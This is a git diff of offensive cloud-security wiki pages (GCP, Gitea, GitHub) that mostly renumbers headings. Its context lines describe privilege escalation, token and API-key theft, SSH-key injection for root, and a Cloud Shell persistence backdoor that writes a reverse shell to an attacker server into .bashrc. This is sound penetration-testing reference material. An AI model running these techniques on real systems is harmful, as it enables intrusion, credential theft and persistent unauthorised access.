Similar to _cloudfunctions.functions.create_, this method **updates (overwrites) an existing function instead of creating a new one**. The API used to update the function also allows you to **swap the Service Account if you have another one you want to get the token for**. The script will update the target function with the malicious code, then wait for it to deploy, then finally invoke it to be returned the Service Account access token.
@@ -52,9 +50,9 @@ The following **permissions are required** for this method:
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).
-## compute
+# compute
-### compute.instances.create,iam.serviceAccounts.actAs
+## compute.instances.create,iam.serviceAccounts.actAs
This method **creates a new Compute Engine instance with a specified Service Account**, then **sends the token** belonging to that Service Account to an **external server.**
@@ -72,9 +70,9 @@ The following **permissions are required** for this method:
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py).
-## run
+# run
-### run.services.create,iam.serviceAccounts.actAs
+## run.services.create,iam.serviceAccounts.actAs
Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service** that, when invoked, **returns the Service Account’s** access token by accessing the metadata API of the server it is running on. A Cloud Run service will be deployed and a request can be performed to it to get the token.
@@ -90,9 +88,9 @@ This method uses an included Docker image that must be built and hosted to explo
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage).
-## Cloudscheduler
+# Cloudscheduler
-### cloudscheduler.jobs.create,iam.serviceAccounts.actAs
+## cloudscheduler.jobs.create,iam.serviceAccounts.actAs
Cloud Scheduler allows you to set up cron jobs targeting arbitrary HTTP endpoints. **If that endpoint is a \*.googleapis.com endpoint**, then you can also tell Scheduler that you want it to authenticate the request **as a specific Service Account**, which is exactly what we want.
@@ -114,9 +112,9 @@ To escalate our privileges with this method, we just need to **craft the HTTP re
A similar method may be possible with Cloud Tasks, but we were not able to do it in our testing.
-## orgpolicy
+# orgpolicy
-### orgpolicy.policy.set
+## orgpolicy.policy.set
This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers** that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download.
@@ -126,13 +124,13 @@ The screenshot above shows that the _appengine.disableCodeDownload_ constraint i
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
-## serviceusage
+# serviceusage
The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
-### serviceusage.apiKeys.create
+## serviceusage.apiKeys.create
There is another method of authenticating with GCP APIs known as API keys. By default, they are created with no restrictions, which means they have access to the entire GCP project they were created in. We can capitalize on that fact by creating a new API key that may have more privileges than our own user. There is no official API for this, so a custom HTTP request needs to be sent to _https://apikeys.clients6.google.com/_ (or _https://apikeys.googleapis.com/_). This was discovered by monitoring the HTTP requests and responses while browsing the GCP web console. For documentation on the restrictions associated with API keys, visit [this link](https://cloud.google.com/docs/authentication/api-keys).
@@ -146,7 +144,7 @@ The screenshot above shows a POST request being sent to retrieve a new API key f
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.create.py).
-### serviceusage.apiKeys.list
+## serviceusage.apiKeys.list
Another undocumented API was found for listing API keys that have already been created (this can also be done in the web console). Because you can still see the API key’s value after its creation, we can pull all the API keys in the project.
@@ -156,13 +154,13 @@ The screenshot above shows that the request is exactly the same as before, it ju
The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py).
-## apikeys
+# apikeys
The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
-### apikeys.keys.create
+## apikeys.keys.create
This permission allows to **create an API key**:
@@ -181,7 +179,7 @@ Operation [operations/akmf.p7-[...]9] complete. Result: {
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/b-apikeys.keys.create.sh).
-### apikeys.keys.getKeyString,apikeys.keys.list
+## apikeys.keys.getKeyString,apikeys.keys.list
These permissions allows **list and get all the apiKeys and get the Key**:
@@ -194,12 +192,12 @@ done
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
-### apikeys.keys.regenerate,apikeys.keys.list
+## apikeys.keys.regenerate,apikeys.keys.list
These permissions will (potentially) allow you to **list and regenerate all the apiKeys getting the new Key**.\
It’s not possible to use this from `gcloud` but you probably can use it via the API. Once it’s supported, the exploitation will be similar to the previous one (I guess).
-### apikeys.keys.lookup
+## apikeys.keys.lookup
This is extremely useful to check to **which GCP project an API key that you have found belongs to**:
@@ -211,17 +209,17 @@ parent: projects/5[...]6/locations/global
In this scenario it could also be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check what you can access with the API key
-## secretmanager
+# secretmanager
-### secretmanager.secrets.get
+## secretmanager.secrets.get
This give you access to read the secrets from the secret manager.
-### secretmanager.secrets.setIamPolicy
+## secretmanager.secrets.setIamPolicy
This give you access to give you access to read the secrets from the secret manager.
-## \*.setIamPolicy
+# \*.setIamPolicy
If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.
@@ -236,17 +234,17 @@ An **example** of privilege escalation abusing .setIamPolicy (in this case in a
[gcp-buckets-brute-force-and-privilege-escalation.md](../gcp-buckets-brute-force-and-privilege-escalation.md)
{% endcontent-ref %}
-## Generic Interesting Permissions
+# Generic Interesting Permissions
-### \*.create, \*.update
+## \*.create, \*.update
These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account.
-### \*ServiceAccount\*
+## \*ServiceAccount\*
This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case.
-## References
+# References
* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
diff --git a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md b/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md
index 65d4c128..c291f3da 100644
--- a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md
+++ b/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - KMS & Secrets Management Enumeration
-
-## Crypto Keys
+# Crypto Keys
[Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level.
@@ -40,7 +38,7 @@ gcloud kms decrypt --ciphertext-file=[INFILE] \
--location global
```
-## Secrets Management
+# Secrets Management
Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta.
@@ -54,7 +52,7 @@ gcloud beta secrets versions access 1 --secret="[SECRET NAME]"
Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on.
-## References
+# References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
index 33909578..05ee585b 100644
--- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
+++ b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Local Privilege Escalation / SSH Pivoting
-
in this scenario we are going to suppose that you **have compromised a non privilege account** inside a VM in a Compute Engine project.
Amazingly, GPC permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible.
-## Read the scripts
+# Read the scripts
**Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts.
@@ -35,7 +33,7 @@ Running `gsutil ls` from the command line returns nothing, as the service accoun
You may be able to find this bucket name inside a script (in bash, Python, Ruby...).
-## Custom Metadata
+# Custom Metadata
Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts.
@@ -49,7 +47,7 @@ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?re
-H "Metadata-Flavor: Google"
```
-## Modifying the metadata
+# Modifying the metadata
If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission:
@@ -67,7 +65,7 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic
* `https://www.googleapis.com/auth/compute`
* `https://www.googleapis.com/auth/cloud-platfo`rm
-### **Add SSH keys to custom metadata**
+## **Add SSH keys to custom metadata**
**Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**.
@@ -75,7 +73,7 @@ Although Google [recommends](https://cloud.google.com/compute/docs/access/servic
So, if you can **modify custom instance metadata** with your service account, you can **escalate** to root on the local system by **gaining SSH rights** to a privileged account. If you can modify **custom project metadata**, you can **escalate** to root on **any system in the current GCP project** that is running the accounts daemon.
-### **Add SSH key to existing privileged user**
+## **Add SSH key to existing privileged user**
Let's start by adding our own key to an existing account, as that will probably make the least noise.
@@ -132,7 +130,7 @@ alice@instance:~$ sudo id
uid=0(root) gid=0(root) groups=0(root)
```
-### **Create a new privileged user and add a SSH key**
+## **Create a new privileged user and add a SSH key**
No existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target?
@@ -156,7 +154,7 @@ gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-k
ssh -i ./key "$NEWUSER"@localhost
```
-### **Grant sudo to existing session**
+## **Grant sudo to existing session**
This one is so easy, quick, and dirty that it feels wrong…
@@ -166,7 +164,7 @@ gcloud compute ssh [INSTANCE NAME]
This will **generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group**, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.
-### SSH keys at project level
+## SSH keys at project level
Following the details mentioned in the previous section you can try to compromise more VMs.
@@ -178,7 +176,7 @@ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.
-## **Using OS Login**
+# **Using OS Login**
[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances.
@@ -197,7 +195,7 @@ If your service account has these permissions. **You can simply run the `gcloud
Similar to using SSH keys from metadata, you can use this strategy to **escalate privileges locally and/or to access other Compute Instances** on the network.
-## Search for Keys in the filesystem
+# Search for Keys in the filesystem
It's quite possible that **other users on the same box have been running `gcloud`** commands using an account more powerful than your own. You'll **need local root** to do this.
@@ -216,7 +214,7 @@ You can manually inspect the files inside, but these are generally the ones with
Now, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.
-### More API Keys regexes
+## More API Keys regexes
```bash
TARGET_DIR="/path/to/whatever"
diff --git a/cloud-security/gcp-security/gcp-looting.md b/cloud-security/gcp-security/gcp-looting.md
index 4b0e18ef..90bc941e 100644
--- a/cloud-security/gcp-security/gcp-looting.md
+++ b/cloud-security/gcp-security/gcp-looting.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Other Services Enumeration
-
-## Stackdriver logging
+# Stackdriver logging
[Stackdriver](https://cloud.google.com/stackdriver/) is Google's general-purpose infrastructure logging suite which might be capturing sensitive information like syslog-like capabilities that report individual commands run inside Compute Instances, HTTP requests sent to load balancers or App Engine applications, network packet metadata for VPC communications, and more.
@@ -46,7 +44,7 @@ gcloud logging read [FOLDER]
gcloud logging write [FOLDER] [MESSAGE]
```
-## AI platform configurations
+# AI platform configurations
Google [AI Platform](https://cloud.google.com/ai-platform/) is another "serverless" offering for machine learning projects.
@@ -57,7 +55,7 @@ $ gcloud ai-platform models list --format=json
$ gcloud ai-platform jobs list --format=json
```
-## Cloud pub/sub
+# Cloud pub/sub
Google [Cloud Pub/Sub](https://cloud.google.com/pubsub/) is a service that allows independent applications to **send messages** back and forth. Basically, there are **topics** where applications may **subscribe** to send and receive **messages** (which are composed by the message content and some metadata).
@@ -74,7 +72,7 @@ gcloud pubsub subscriptions pull [SUBSCRIPTION NAME]
However, you may have better results [asking for a larger set of data](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing.
-## Cloud Git repositories
+# Cloud Git repositories
Google's [Cloud Source Repositories](https://cloud.google.com/source-repositories/) are Git designed to be private storage for source code. You might **find useful secrets here**, or use the **source to discover vulnerabilities** in other applications.
@@ -88,7 +86,7 @@ gcloud source repos list
gcloud source repos clone [REPO NAME]
```
-## Cloud Filestore Instances
+# Cloud Filestore Instances
Google [Cloud Filestore](https://cloud.google.com/filestore/) is NAS for Compute Instances and Kubernetes Engine instances. You can think of this like any other **shared document repository -** a potential source of sensitive info.
@@ -98,7 +96,7 @@ If you find a filestore available in the project, you can **mount it** from with
gcloud filestore instances list --format=json
```
-## Containers
+# Containers
```bash
gcloud container images list
@@ -110,7 +108,7 @@ gcloud container clusters get-credentials [NAME]
docker run --rm -ti gcr.io//secret:v1 sh
```
-## Kubernetes
+# Kubernetes
First, you can check to see if any Kubernetes clusters exist in your project.
@@ -136,7 +134,7 @@ You can read more about `gcloud` for containers [here](https://cloud.google.com/
This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum)
-## References
+# References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
diff --git a/cloud-security/gcp-security/gcp-network-enumeration.md b/cloud-security/gcp-security/gcp-network-enumeration.md
index 8434b74a..edf76754 100644
--- a/cloud-security/gcp-security/gcp-network-enumeration.md
+++ b/cloud-security/gcp-security/gcp-network-enumeration.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Network Enumeration
+# Network Enumeration
-## Network Enumeration
-
-### Compute
+## Compute
```bash
# List networks
diff --git a/cloud-security/gcp-security/gcp-persistance.md b/cloud-security/gcp-security/gcp-persistance.md
index 11b2b4be..f8c40d53 100644
--- a/cloud-security/gcp-security/gcp-persistance.md
+++ b/cloud-security/gcp-security/gcp-persistance.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Persistance
-
These are useful techniques once, somehow, you have compromised some GCP credentials or machine running in a GCP environment.
-## Google’s Cloud Shell
+# Google’s Cloud Shell
-### Persistent Backdoor
+## Persistent Backdoor
[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost.
@@ -41,7 +39,7 @@ This basically means that an attacker may put a backdoor in the home directory o
echo '(nohup /usr/bin/env -i /bin/bash 2>/dev/null -norc -noprofile >& /dev/tcp/'$CCSERVER'/443 0>&1 &)' >> $HOME/.bashrc
```
-### Container Escape
+## Container Escape
Note that the Google Cloud Shell runs inside a container, you can **easily escape to the host** by doing:
@@ -70,9 +68,9 @@ https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
```
-## Token Hijacking
+# Token Hijacking
-### Authenticated User
+## Authenticated User
If you manage to access the home folder of an **authenticated user in GCP**, by **default**, you will be able to **get tokens for that user as long as you want** without needing to authenticated and independently on the machine you use his tokens from and even if the user has MFA configured.
@@ -96,20 +94,20 @@ To get a new refreshed access token with the refresh token, client ID, and clien
curl -s --data client_id= --data client_secret= --data grant_type=refresh_token --data refresh_token= --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
```
-### Service Accounts
+## Service Accounts
Just like with authenticated users, if you manage to **compromise the private key file** of a service account you will be able to **access it usually as long as you want**.\
However, if you steal the **OAuth token** of a service account this can be even more interesting, because, even if by default these tokens are useful just for an hour, if the **victim deletes the private api key, the OAuh token will still be valid until it expires**.
-### Metadata
+## Metadata
Obviously, as long as you are inside a machine running in the GCP environment you will be able to **access the service account attached to that machine contacting the metadata endpoint** (note that the Oauth tokens you can access in this endpoint are usually restricted by scopes).
-### Remediations
+## Remediations
Some remediations for these techniques are explained in [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2)
-## References
+# References
* [https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec](https://89berner.medium.com/persistant-gcp-backdoors-with-googles-cloud-shell-2f75c83096ec)
* [https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1](https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-1)
diff --git a/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md b/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md
index 723fa81b..a982067c 100644
--- a/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md
+++ b/cloud-security/gcp-security/gcp-serverless-code-exec-services-enumeration.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# GCP - Serverless Code Exec Services Enumeration
-
-## Cloud Functions
+# Cloud Functions
Google [Cloud Functions](https://cloud.google.com/functions/) allow you to host code that is executed when an event is triggered, without the requirement to manage a host operating system. These functions can also store environment variables to be used by the code.
@@ -35,18 +33,18 @@ gcloud functions describe [FUNCTION NAME]
gcloud functions logs read [FUNCTION NAME] --limit [NUMBER]
```
-### Enumerate Open Cloud Functions
+## Enumerate Open Cloud Functions
With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_functions.sh) you can find Cloud Functions that permit unauthenticated invocations.
```bash
#!/bin/bash
-#############################
+############################
# Run this tool to find Cloud Functions that permit unauthenticated invocations
# anywhere in your GCP organization.
# Enjoy!
-#############################
+############################
for proj in $(gcloud projects list --format="get(projectId)"); do
echo "[*] scraping project $proj"
@@ -86,7 +84,7 @@ done
```
-## App Engine Configurations
+# App Engine Configurations
Google [App Engine](https://cloud.google.com/appengine/) is another ["serverless"](https://about.gitlab.com/topics/serverless/) offering for hosting applications, with a focus on scalability. As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an `app.yaml` file which can be accessed as follows:
@@ -98,7 +96,7 @@ gcloud app versions list
gcloud app describe [APP]
```
-## Cloud Run Configurations
+# Cloud Run Configurations
Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response.
@@ -122,18 +120,18 @@ curl -H \
[URL]
```
-### Enumerate Open CloudRun
+## Enumerate Open CloudRun
With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_misc/-/blob/master/find\_open\_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations.
```bash
#!/bin/bash
-#############################
+############################
# Run this tool to find Cloud Run services that permit unauthenticated
# invocations anywhere in your GCP organization.
# Enjoy!
-#############################
+############################
for proj in $(gcloud projects list --format="get(projectId)"); do
echo "[*] scraping project $proj"
@@ -169,7 +167,7 @@ done
```
-## References
+# References
* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
diff --git a/cloud-security/gitea-security/README.md b/cloud-security/gitea-security/README.md
index d6172856..6d30d33a 100644
--- a/cloud-security/gitea-security/README.md
+++ b/cloud-security/gitea-security/README.md
@@ -17,21 +17,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Gitea Security
-
-## What is Gitea
+# What is Gitea
**Gitea** is a **self-hosted community managed lightweight code hosting** solution written in Go.
.png>)
-### Basic Information
+## Basic Information
{% content-ref url="basic-gitea-information.md" %}
[basic-gitea-information.md](basic-gitea-information.md)
{% endcontent-ref %}
-## Lab
+# Lab
To run a Gitea instance locally you can just run a docker container:
@@ -48,7 +46,7 @@ helm repo add gitea-charts https://dl.gitea.io/charts/
helm install gitea gitea-charts/gitea
```
-## Unauthenticated Enumeration
+# Unauthenticated Enumeration
* Public repos: [http://localhost:3000/explore/repos](http://localhost:3000/explore/repos)
* Registered users: [http://localhost:3000/explore/users](http://localhost:3000/explore/users)
@@ -56,11 +54,11 @@ helm install gitea gitea-charts/gitea
Note that by **default Gitea allows new users to register**. This won't give specially interesting access to the new users over other organizations/users repos, but a **logged in user** might be able to **visualize more repos or organizations**.
-## Internal Exploitation
+# Internal Exploitation
For this scenario we are going to suppose that you have obtained some access to a github account.
-### With User Credentials/Web Cookie
+## With User Credentials/Web Cookie
If you somehow already have credentials for a user inside an organization (or you stole a session cookie) you can **just login** and check which which **permissions you have** over which **repos,** in **which teams** you are, **list other users**, and **how are the repos protected.**
@@ -70,7 +68,7 @@ Note that **2FA may be used** so you will only be able to access this informatio
Note that if you **manage to steal the `i_like_gitea` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
{% endhint %}
-### With User SSH Key
+## With User SSH Key
Gitea allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
@@ -86,7 +84,7 @@ If the user has configured its username as his gitea username you can access the
**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
-#### GPG Keys
+### GPG Keys
As explained [**here**](../github-security/basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered.
@@ -96,13 +94,13 @@ Check locally if the current user has any key with:
gpg --list-secret-keys --keyid-format=long
```
-### With User Token
+## With User Token
For an introduction about [**User Tokens check the basic information**](basic-gitea-information.md#personal-access-tokens).
A user token can be used **instead of a password** to **authenticate** against Gitea server [**via API**](https://try.gitea.io/api/swagger#/). it will has **complete access** over the user.
-### With Oauth Application
+## With Oauth Application
For an introduction about [**Gitea Oauth Applications check the basic information**](basic-gitea-information.md#oauth-applications).
@@ -110,7 +108,7 @@ An attacker might create a **malicious Oauth Application** to access privileged
As explained in the basic information, the application will have **full access over the user account**.
-### Branch Protection Bypass
+## Branch Protection Bypass
In Github we have **github actions** which by default get a **token with write access** over the repo that can be used to **bypass branch protections**. In this case that **doesn't exist**, so the bypasses are more limited. But lets take a look to what can be done:
@@ -123,7 +121,7 @@ In Github we have **github actions** which by default get a **token with write a
Note that **if you are an org/repo admin** you can bypass the protections.
-### Enumerate Webhooks
+## Enumerate Webhooks
**Webhooks** are able to **send specific gitea information to some places**. You might be able to **exploit that communication**.\
However, usually a **secret** you can **not retrieve** is set in the **webhook** that will **prevent** external users that know the URL of the webhook but not the secret to **exploit that webhook**.\
@@ -131,9 +129,9 @@ But in some occasions, people instead of setting the **secret** in its place, th
Webhooks can be set at **repo and at org level**.
-## Post Exploitation
+# Post Exploitation
-### Inside the server
+## Inside the server
If somehow you managed to get inside the server where gitea is running you should search for the gitea configuration file. By default it's located in `/data/gitea/conf/app.ini`
diff --git a/cloud-security/gitea-security/basic-gitea-information.md b/cloud-security/gitea-security/basic-gitea-information.md
index 27c17ee2..7a3ed664 100644
--- a/cloud-security/gitea-security/basic-gitea-information.md
+++ b/cloud-security/gitea-security/basic-gitea-information.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Basic Gitea Information
-
-## Basic Structure
+# Basic Structure
The basic gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
@@ -29,9 +27,9 @@ A user may also be **part of different teams** with different permissions over d
And finally **repositories may have special protection mechanisms**.
-## Permissions
+# Permissions
-### Organizations
+## Organizations
When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
@@ -53,7 +51,7 @@ When creating a new team, several important settings are selected:
 (1).png>)
-### Teams & Users
+## Teams & Users
In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
@@ -61,35 +59,35 @@ In a repo, the **org admin** and the **repo admins** (if allowed by the org) can
* Write
* Read
-## Gitea Authentication
+# Gitea Authentication
-### Web Access
+## Web Access
Using **username + password** and potentially (and recommended) a 2FA.
-### **SSH Keys**
+## **SSH Keys**
You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
-#### **GPG Keys**
+### **GPG Keys**
You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
-### **Personal Access Tokens**
+## **Personal Access Tokens**
You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
-### Oauth Applications
+## Oauth Applications
Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
.png>)
-### Deploy keys
+## Deploy keys
Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
-## Branch Protections
+# Branch Protections
Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
diff --git a/cloud-security/github-security/README.md b/cloud-security/github-security/README.md
index 6122af51..5b530fa8 100644
--- a/cloud-security/github-security/README.md
+++ b/cloud-security/github-security/README.md
@@ -17,19 +17,17 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Github Security
-
-## What is Github
+# What is Github
(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
-### Basic Information
+## Basic Information
{% content-ref url="basic-github-information.md" %}
[basic-github-information.md](basic-github-information.md)
{% endcontent-ref %}
-## External Recon
+# External Recon
Github repositories can be configured as public, private and internal.
@@ -39,7 +37,7 @@ Github repositories can be configured as public, private and internal.
In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
-### Github Dorks
+## Github Dorks
Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
@@ -49,7 +47,7 @@ Tools (each tool contains its list of dorks):
* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
-### Github Leaks
+## Github Leaks
Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
@@ -63,11 +61,11 @@ Tools (each tool contains its list of regexes):
